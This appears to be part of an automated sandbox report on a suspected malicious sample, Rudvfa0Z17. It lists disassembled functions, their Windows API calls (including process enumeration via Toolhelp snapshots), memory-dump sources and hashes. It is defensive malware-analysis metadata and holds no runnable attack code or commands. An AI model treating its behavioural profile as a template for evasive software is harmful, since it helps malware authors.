                                • Instruction ID: 30edfebacd864dae4cba8a7ac67a3145ff47352efdd4f303b8bcfa43c8e20d87
                                • Opcode Fuzzy Hash: e444c0e42f906dcbddc2727c2d64d1d77e0876490b577f2cd922582846f8c114
                                • Instruction Fuzzy Hash: 7E11E2B1804788EFC710CF99C880AAAFBF8FB14300F408A6FF45593640D774A608CBA9
                                Function 026DA067 Relevance: 9.3, APIs: 6, Instructions: 301COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3_GS.LIBCMT ref: 026DA071
                                • wsprintfA.USER32 ref: 026DA100
                                • wsprintfA.USER32 ref: 026DA423
                                  • Part of subcall function 026D8B95: __fassign.LIBCMT ref: 026D8BA8
                                • _wprintf.LIBCMT ref: 026DA19F
                                • std::_Xinvalid_argument.LIBCPMT ref: 026DA3FF
                                • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10017380,000000FF), ref: 026DA439
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
                                • String ID:
                                • API String ID: 2279894289-0
                                • Opcode ID: 3497b7195cda61148555650dbdf71ca7da6f6a0dc9df4403e6f0026ca4a87f2b
                                • Instruction ID: ca6f7476626d3b5e609135a60ec503627d66b88075262e18aa901ee7f5a91bf5
                                • Opcode Fuzzy Hash: 3497b7195cda61148555650dbdf71ca7da6f6a0dc9df4403e6f0026ca4a87f2b
                                • Instruction Fuzzy Hash: E8C11871D0826C9BCF22DFA4CC80BDDBBB9AB04304F5485AAE949A7240D770AF85CF55
                                Function 00538F0B Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3_catch.LIBCMT ref: 00538F12
                                • GlobalLock.KERNEL32(?,?,?), ref: 00538FF8
                                • CreateDialogIndirectParamW.USER32(?,?,?,00538861,00000000), ref: 00539027
                                • DestroyWindow.USER32(00000000), ref: 005390A1
                                • GlobalUnlock.KERNEL32(?), ref: 005390B1
                                • GlobalFree.KERNEL32(?), ref: 005390BA
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                                • String ID:
                                • API String ID: 3003189058-0
                                • Opcode ID: 4ccf58093d1c333d12ead34845017521f68754433bec267b41c490102afdc7f3
                                • Instruction ID: 5479999a80d495aeb7cbc976a634d616aab9f5050f24e8f63811d5a1fc48cb7b
                                • Opcode Fuzzy Hash: 4ccf58093d1c333d12ead34845017521f68754433bec267b41c490102afdc7f3
                                • Instruction Fuzzy Hash: 17516D71A0024ADFCF14EFA4C8899EEBFB5BF84314F14452DF542A72A1DB709A45CB61
                                Function 005A0C6D Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000002,?,?,?,?,?,005A0DB6,00000000,00000000,?,?,005A2BCA,?,?,?,00000084), ref: 005A0C7D
                                • GlobalLock.KERNEL32(00000000,?,005A0DB6,00000000,00000000,?,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A), ref: 005A0C95
                                • _memmove.LIBCMT ref: 005A0CA2
                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000,?), ref: 005A0CB1
                                • EnterCriticalSection.KERNEL32(0073BF7C,00000000), ref: 005A0CCA
                                • LeaveCriticalSection.KERNEL32(0073BF7C,00000000), ref: 005A0D31
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Global$CriticalSection$AllocCreateEnterLeaveLockStream_memmove
                                • String ID:
                                • API String ID: 861836607-0
                                • Opcode ID: 526725fd6f2a54b5203aea163b927db4e9eab3c19d260a16980050694004d8d4
                                • Instruction ID: 723b10142501e81c227946937d3e171a4ef0492989f4ccc9acfb5ee6c1725a21
                                • Opcode Fuzzy Hash: 526725fd6f2a54b5203aea163b927db4e9eab3c19d260a16980050694004d8d4
                                • Instruction Fuzzy Hash: 3B21F375A1020ABBDB10ABB0DC59B6E7FA9FF08365F106215F901D6291EB34DD40CB65
                                Function 005394AF Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowLongW.USER32(?,000000F0), ref: 005394E2
                                • GetParent.USER32(?), ref: 005394F0
                                • GetParent.USER32(?), ref: 00539503
                                • GetLastActivePopup.USER32(?), ref: 00539514
                                • IsWindowEnabled.USER32(?), ref: 00539528
                                • EnableWindow.USER32(?,00000000), ref: 0053953B
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                • String ID:
                                • API String ID: 670545878-0
                                • Opcode ID: f85e988b6dd063a92da9731562eb5832517575daa5fac298cc417a5ad7b44e7a
                                • Instruction ID: caad1110258afdafcf25bd2fee8b6b0ca5e4a1e11ecf7ab5e2b21a18e9d2185a
                                • Opcode Fuzzy Hash: f85e988b6dd063a92da9731562eb5832517575daa5fac298cc417a5ad7b44e7a
                                • Instruction Fuzzy Hash: D611A3F260222267DF721A699C84B6B6F9D7F95B60F150210EC05E7255EBF0CD4187E1
                                Function 026D1802 Relevance: 9.1, APIs: 6, Instructions: 51processstringCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 026D1825
                                • _memset.LIBCMT ref: 026D183A
                                • Process32FirstW.KERNEL32(00000000,?), ref: 026D1854
                                • lstrcmpiW.KERNEL32(?,?), ref: 026D1869
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 026D187B
                                • CloseHandle.KERNEL32(00000000), ref: 026D188E
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memsetlstrcmpi
                                • String ID:
                                • API String ID: 2129496168-0
                                • Opcode ID: c5a9032939595190b898ad5427888ca66ad21a98790668b7f26350e3c35d2074
                                • Instruction ID: 3192ad46f2a0562b1952ce40e959d37fe7c4d6edc9921d87083653b93818b962
                                • Opcode Fuzzy Hash: c5a9032939595190b898ad5427888ca66ad21a98790668b7f26350e3c35d2074
                                • Instruction Fuzzy Hash: 0F110C71A0021CABEB50EFA4DCC8AAAB7BCBB09744F0040A9E605D2150DB78DF49CF60
                                Function 100017FE Relevance: 9.1, APIs: 6, Instructions: 51processstringCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001821
                                • _memset.LIBCMT ref: 10001836
                                • Process32FirstW.KERNEL32(00000000,?), ref: 10001850
                                • lstrcmpiW.KERNEL32(?,?), ref: 10001865
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 10001877
                                • CloseHandle.KERNEL32(00000000), ref: 1000188A
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memsetlstrcmpi
                                • String ID:
                                • API String ID: 2129496168-0
                                • Opcode ID: c5a9032939595190b898ad5427888ca66ad21a98790668b7f26350e3c35d2074
                                • Instruction ID: 48be9d534c6f7ae1162ece858ad7ff7c85b295601d6015b5433e981284ae0b0a
                                • Opcode Fuzzy Hash: c5a9032939595190b898ad5427888ca66ad21a98790668b7f26350e3c35d2074
                                • Instruction Fuzzy Hash: 7811F771A0021CABEB50DBA5DCC9AAEB7BCFB08684F1041A9E505D2150DB78EF48CB60
                                Function 0064D848 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 0064D854
                                  • Part of subcall function 00645CA8: __getptd_noexit.LIBCMT ref: 00645CAB
                                  • Part of subcall function 00645CA8: __amsg_exit.LIBCMT ref: 00645CB8
                                • __amsg_exit.LIBCMT ref: 0064D874
                                • __lock.LIBCMT ref: 0064D884
                                • InterlockedDecrement.KERNEL32(?), ref: 0064D8A1
                                • _free.LIBCMT ref: 0064D8B4
                                • InterlockedIncrement.KERNEL32(02572D00), ref: 0064D8CC
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                • String ID:
                                • API String ID: 3470314060-0
                                • Opcode ID: aca81ef20a275feb592d8cffede4921b8c8635df1298b82f26911984056ae1aa
                                • Instruction ID: 0b45c1a15772a907cefcd076acac7bbd7ed1c52a3a15516d6d346479437fd9bc
                                • Opcode Fuzzy Hash: aca81ef20a275feb592d8cffede4921b8c8635df1298b82f26911984056ae1aa
                                • Instruction Fuzzy Hash: F0018031D00721AFEB65AB6598457AD7762BF00722F05501DF801AB2D1CB78AE81CBDA
                                Function 026DE063 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 026DE06F
                                  • Part of subcall function 026DEA0D: __getptd_noexit.LIBCMT ref: 026DEA10
                                  • Part of subcall function 026DEA0D: __amsg_exit.LIBCMT ref: 026DEA1D
                                • __amsg_exit.LIBCMT ref: 026DE08F
                                • __lock.LIBCMT ref: 026DE09F
                                • InterlockedDecrement.KERNEL32(?), ref: 026DE0BC
                                • _free.LIBCMT ref: 026DE0CF
                                • InterlockedIncrement.KERNEL32(10020670), ref: 026DE0E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                • String ID:
                                • API String ID: 3470314060-0
                                • Opcode ID: 6b734a3c0f387b71fdf5a8eab89ac20fe8d4012c3391868757373a917024e17b
                                • Instruction ID: b77bbba200216fd19ebe1861685ab4c599057b711e1b47641a1ce8f78bc21134
                                • Opcode Fuzzy Hash: 6b734a3c0f387b71fdf5a8eab89ac20fe8d4012c3391868757373a917024e17b
                                • Instruction Fuzzy Hash: 3101C431D00769EBE721EF24888875D7762BB40724F944109EC11ABB90CB35A562CFD5
                                Function 1000E05F Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 1000E06B
                                  • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                  • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                • __amsg_exit.LIBCMT ref: 1000E08B
                                • __lock.LIBCMT ref: 1000E09B
                                • InterlockedDecrement.KERNEL32(?), ref: 1000E0B8
                                • _free.LIBCMT ref: 1000E0CB
                                • InterlockedIncrement.KERNEL32(10020670), ref: 1000E0E3
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                • String ID:
                                • API String ID: 3470314060-0
                                • Opcode ID: e503b38899fc1a29c20fb0dfb269530488a74d22e43012d9d9e3d18c058fb6d0
                                • Instruction ID: 44ac7dee67aa228faf62a7f712449706e970d0ab81b91fd94cc9ca9f82e1b276
                                • Opcode Fuzzy Hash: e503b38899fc1a29c20fb0dfb269530488a74d22e43012d9d9e3d18c058fb6d0
                                • Instruction Fuzzy Hash: 9E01ED359017A2EBFB50DF64888575EB7A0FB403D0F114109F80073A9ACBB4ADC2CB91
                                Function 00409B4C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 232fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040E1B0: _memcpy_s.LIBCMT ref: 0040E1FE
                                  • Part of subcall function 00406F50: GetPrivateProfileStringW.KERNEL32(?,?,006FD638,?,00000104,?), ref: 00407008
                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000000,00000000), ref: 00409C2F
                                • CloseHandle.KERNEL32(00000000), ref: 00409C3B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CloseCreateFileHandlePrivateProfileString_memcpy_s
                                • String ID: 5$Append$AppendConfig
                                • API String ID: 79106774-350907740
                                • Opcode ID: 2e6965b5df3f8dfad31b6edf045d025977a6940ae358be02456ca76c035c7470
                                • Instruction ID: 06c66d2126c4b2e9dbee7dd30553911df190c32867d4856d531fbafd0fa60377
                                • Opcode Fuzzy Hash: 2e6965b5df3f8dfad31b6edf045d025977a6940ae358be02456ca76c035c7470
                                • Instruction Fuzzy Hash: F9919D70A01A419FD704CBACCC45B59B7B5BF86334B288399E0259B3E6DB35AD06CB54
                                Function 0063A520 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                • String ID: Yr?
                                • API String ID: 2782032738-3814531584
                                • Opcode ID: a584004fc8b3a9089610cee54cf01574a296b3d080a3ef681ce58d3a7734c3a5
                                • Instruction ID: c7fab856d2a27a766db93898b076ec008c535135ce2a0e5626932eaa9228ed76
                                • Opcode Fuzzy Hash: a584004fc8b3a9089610cee54cf01574a296b3d080a3ef681ce58d3a7734c3a5
                                • Instruction Fuzzy Hash: 8041B231A006049BDF249FE9C845AAEBBB7AF81730F28852CE49597390D770DD55EBC2
                                Function 00405630 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$_memmove
                                • String ID: .log$string too long
                                • API String ID: 2168136238-1238634221
                                • Opcode ID: 3e742d8286ec06c4de4ca1d32461e9233f1f9db3feed9340cb34e9c00e48ac34
                                • Instruction ID: ba63fa9c0fdd71f83f8827a9d30a3fd893f18fd041617f137f78797f6e50b4b2
                                • Opcode Fuzzy Hash: 3e742d8286ec06c4de4ca1d32461e9233f1f9db3feed9340cb34e9c00e48ac34
                                • Instruction Fuzzy Hash: A031C672304A048BC724CE68D99083BB3EAFFA57107600A3FE546976D0DB769D448FAD
                                Function 00427080 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00427102
                                  • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                • GdipCreateSolidFill.GDIPLUS ref: 0042715F
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000001), ref: 004271BA
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 004271D3
                                  • Part of subcall function 00422E40: GdipCreateFontFamilyFromName.GDIPLUS(Arial,00000000,?,?), ref: 00422E5B
                                  • Part of subcall function 00422E40: GdipGetGenericFontFamilySansSerif.GDIPLUS(0073EDC0), ref: 00422E8B
                                  • Part of subcall function 00422E40: GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00422EAA
                                  • Part of subcall function 00426490: _memmove.LIBCMT ref: 004264BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Gdip$CreateFamilyFontFormatString$Align$DeleteFillFromGenericLineNameSansSerifSolid_malloc_memmove
                                • String ID: Arial
                                • API String ID: 1021613781-493054409
                                • Opcode ID: ff3d46a19efac168aa280bdbbc5263b041703c1584c32ddb2c4bbcdb0bc8ad0b
                                • Instruction ID: 0bafeee3e478fa15c3afb410d5084de8db8b7d304c09bfec7a29d6d6ddfbd72b
                                • Opcode Fuzzy Hash: ff3d46a19efac168aa280bdbbc5263b041703c1584c32ddb2c4bbcdb0bc8ad0b
                                • Instruction Fuzzy Hash: 7B416AB1A042119FDB04CF64D884BAABBE5FF48700F04867AED49DB345DB749504CBA5
                                Function 00550625 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110stringCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalLock.KERNEL32(?,75FD5E50,System,0000000A,005507DC,System,?,?,00000000), ref: 00550641
                                • lstrlenW.KERNEL32(?), ref: 0055068B
                                • _wcslen.LIBCMT ref: 005506B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: GlobalLock_wcslenlstrlen
                                • String ID: System
                                • API String ID: 2647411976-3470857405
                                • Opcode ID: f39bcbfda8f597f1fbf3b49dc39bde4e49d60923d9f7ff5209de74a37cda31a2
                                • Instruction ID: ce4b619c5544d0fa4834df70ab7fce9c4f76a370b74c7e5a68fc2b5b4f70c887
                                • Opcode Fuzzy Hash: f39bcbfda8f597f1fbf3b49dc39bde4e49d60923d9f7ff5209de74a37cda31a2
                                • Instruction Fuzzy Hash: 1041E371900216EFCF14DF64C8955AEBBB9FF44305F10866AEC1697281E734AE98CB90
                                Function 00401E20 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401E3A
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                  • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401E77
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                  • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                • _memmove.LIBCMT ref: 00401ED8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1615890066-4289949731
                                • Opcode ID: 0e9a4391b2991cbb6a130a05588d582def284d2fc4114e38a9ee751e6891da86
                                • Instruction ID: e808f1c6e905dae4937ea79d9719188c59fe702de034b9e396e897d93512bda5
                                • Opcode Fuzzy Hash: 0e9a4391b2991cbb6a130a05588d582def284d2fc4114e38a9ee751e6891da86
                                • Instruction Fuzzy Hash: 4D31B4333002148BD7209A5CE880A6EF3AAEBA1765F21063FF951DB2E1C7759C4087E9
                                Function 00412970 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 005475A7: __EH_prolog3.LIBCMT ref: 005475AE
                                  • Part of subcall function 005475A7: lstrlenW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000,00000001,?), ref: 005475E8
                                  • Part of subcall function 005475A7: VariantClear.OLEAUT32(?), ref: 00547654
                                  • Part of subcall function 005475A7: VariantClear.OLEAUT32(?), ref: 0054765A
                                  • Part of subcall function 005475A7: VariantClear.OLEAUT32(?), ref: 00547660
                                  • Part of subcall function 005475A7: VariantClear.OLEAUT32(00000000), ref: 00547666
                                  • Part of subcall function 005475A7: SysFreeString.OLEAUT32(?), ref: 0054766B
                                • VariantCopy.OLEAUT32(00000000,?), ref: 004129F0
